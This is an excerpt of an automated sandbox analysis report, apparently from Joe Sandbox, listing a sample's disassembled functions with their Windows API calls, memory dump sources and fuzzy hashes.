                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: 22ec3d64a413336b4423cd6965df5dfe6652ea46e993476b1a72b7c61a8009e7
                                    • Instruction ID: b386d3f310406ae92dc52bca068daa490a0f5cb366daa9a4c96c787cfa895054
                                    • Opcode Fuzzy Hash: 22ec3d64a413336b4423cd6965df5dfe6652ea46e993476b1a72b7c61a8009e7
                                    • Instruction Fuzzy Hash: 1931097191100C9BCB65EFA8DD41BED33B8BF48300F0444B9BA2AD7240DF789E84AB91
                                    Function 00F84480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00F84492
                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00F844AD
                                    • CloseHandle.KERNEL32(00000000), ref: 00F844B4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F844E7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                    • String ID:
                                    • API String ID: 4028989146-0
                                    • Opcode ID: 70a92b7fc1c60bf399efeeb07cef1ab388e2edd1cbb043b769fe412519187b08
                                    • Instruction ID: 5433b3f2917a7f0ddc2a90426be009a3df2feaba978dc882daf062014cd40b76
                                    • Opcode Fuzzy Hash: 70a92b7fc1c60bf399efeeb07cef1ab388e2edd1cbb043b769fe412519187b08
                                    • Instruction Fuzzy Hash: 43F0C8B0D016192BE730EB749C49BE6B6A8AB14714F0405A5EE65D6180E6B498C08790
                                    Function 00F88FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 00F88FDD
                                      • Part of subcall function 00F887FF: __amsg_exit.LIBCMT ref: 00F8880F
                                    • __getptd.LIBCMT ref: 00F88FF4
                                    • __amsg_exit.LIBCMT ref: 00F89002
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00F89026
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 578de0e56d5b31839ed8e5bdfaf6943fa55ed1ac96c7deaa4dd67dcb70e26812
                                    • Instruction ID: 5ee56edcfe20130a70510fff8b45b2398a255d49e186111d3f39b7709afeb88f
                                    • Opcode Fuzzy Hash: 578de0e56d5b31839ed8e5bdfaf6943fa55ed1ac96c7deaa4dd67dcb70e26812
                                    • Instruction Fuzzy Hash: ADF0903294C7109BDB61BB789C067ED33A06F00761F794109F444AA2D2DFAC9941FB59
                                    Function 00F87310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(------,00F65BEB), ref: 00F8731B
                                    • lstrcpy.KERNEL32(00000000), ref: 00F8733F
                                    • lstrcat.KERNEL32(?,------), ref: 00F87349
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcatlstrcpylstrlen
                                    • String ID: ------
                                    • API String ID: 3050337572-882505780
                                    • Opcode ID: 91505e65e7c78b3e0e66e46cbc649df99590305e23eb4ebdf275ac33058835a2
                                    • Instruction ID: 2d8125fb94c9c885009d867d55c4dbfd2b32fba9fea28819a69580e345b98e00
                                    • Opcode Fuzzy Hash: 91505e65e7c78b3e0e66e46cbc649df99590305e23eb4ebdf275ac33058835a2
                                    • Instruction Fuzzy Hash: 7FF0E5749117029FDB68AF36D848A27B7F9EF95715328882DACEAC7204E734D880DB11
                                    Function 00F733D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F73422
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7344B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F73471
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F73497
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: bc393b4e4c015ec0f022a884392c3097814433920f37e8d208cea33b9f2ceb13
                                    • Instruction ID: 1ce57f97054e03ea9923db31a31b004f38e6a3a338f5b657e2ae075768d82d23
                                    • Opcode Fuzzy Hash: bc393b4e4c015ec0f022a884392c3097814433920f37e8d208cea33b9f2ceb13
                                    • Instruction Fuzzy Hash: 30120BB1E01205AFDB28CF19C554A25B7E5BF48328B1DC0AED41D8B3A5D772ED42EB42
                                    Function 00F77C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F77C94
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F77CAF
                                      • Part of subcall function 00F77D40: std::_Xinvalid_argument.LIBCPMT ref: 00F77D58
                                      • Part of subcall function 00F77D40: std::_Xinvalid_argument.LIBCPMT ref: 00F77D76
                                      • Part of subcall function 00F77D40: std::_Xinvalid_argument.LIBCPMT ref: 00F77D91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: string too long
                                    • API String ID: 909987262-2556327735
                                    • Opcode ID: 82ca6dc557b5b9413b094e2c7af78882667b689db1335bef0e8afdf1094e0c14
                                    • Instruction ID: 8927cf1e45b87af45fe2e22c6ae12fb6b3ed26713565270371102fefb6a74301
                                    • Opcode Fuzzy Hash: 82ca6dc557b5b9413b094e2c7af78882667b689db1335bef0e8afdf1094e0c14
                                    • Instruction Fuzzy Hash: 1D314B723183104BE731ED6CE88096AF3E9EF99760B20862BF449CB641C7719C4193A6
                                    Function 00F66EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 00F66F74
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F66F7B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID: @
                                    • API String ID: 1357844191-2766056989
                                    • Opcode ID: ea7f5b8f4d268e38278492be54ca4f4d7e5eca007a6530a04942ff284e62f1a7
                                    • Instruction ID: 9c837e5046657c4789e6dd4cc79824591d7e878e5a4c33c3ce069a198af710f0
                                    • Opcode Fuzzy Hash: ea7f5b8f4d268e38278492be54ca4f4d7e5eca007a6530a04942ff284e62f1a7
                                    • Instruction Fuzzy Hash: DA218EB0A007019BEB208B21D884BB773F8EB44704F44497CF956CB685F7B9E985D791
                                    Function 00F82400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F8244C
                                    • lstrlen.KERNEL32(00000000), ref: 00F824E9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F82570
                                    • lstrlen.KERNEL32(00000000), ref: 00F82577
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 8c6ad46544ad868e427afc2baf384f2499f14bde19631a489c990d220471ad82
                                    • Instruction ID: 6b6281677cfc3ce5612e33286a3ed2c534959b9f6dec8faca3a86f398f7e968f
                                    • Opcode Fuzzy Hash: 8c6ad46544ad868e427afc2baf384f2499f14bde19631a489c990d220471ad82
                                    • Instruction Fuzzy Hash: 1C81D2B0E002099BDB54EB94DC54BEEB7B5BF84314F18807DE904AB281EB75AD42DB94
                                    Function 00F81570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 00F815A1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F815D9
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F81611
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F81649
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: ffc557e5b43767995da7ce091efe824b6f8a8c49a366b3e750a2d1dd96876766
                                    • Instruction ID: 944e339318d6923e5beba645ee48a5a48f17da8b868026589ad255705df4a1b9
                                    • Opcode Fuzzy Hash: ffc557e5b43767995da7ce091efe824b6f8a8c49a366b3e750a2d1dd96876766
                                    • Instruction Fuzzy Hash: 8721F1B4A01B029FD734EF69D955A17B7F9BF44710B084A2CA496C7A40EB34F841DB50
                                    Function 00F61530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F61610: lstrcpy.KERNEL32(00000000), ref: 00F6162D
                                      • Part of subcall function 00F61610: lstrcpy.KERNEL32(00000000,?), ref: 00F6164F
                                      • Part of subcall function 00F61610: lstrcpy.KERNEL32(00000000,?), ref: 00F61671
                                      • Part of subcall function 00F61610: lstrcpy.KERNEL32(00000000,?), ref: 00F61693
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 2c80c8cb211f681cab4728ccbad31b13ff7116e09bd3abd0b9071c22c6b59a46
                                    • Instruction ID: 3474c0d4608bed24dfc3d204b02bb569cb6725bdd75b48033a4f18824bd1aea0
                                    • Opcode Fuzzy Hash: 2c80c8cb211f681cab4728ccbad31b13ff7116e09bd3abd0b9071c22c6b59a46
                                    • Instruction Fuzzy Hash: 3531A5B4A11B029FD768DF3AC589956FBF5BF88315708492DA8A6C3B10DB34F851DB80
                                    Function 00F61610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 00F6162D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6164F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61671
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61693
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
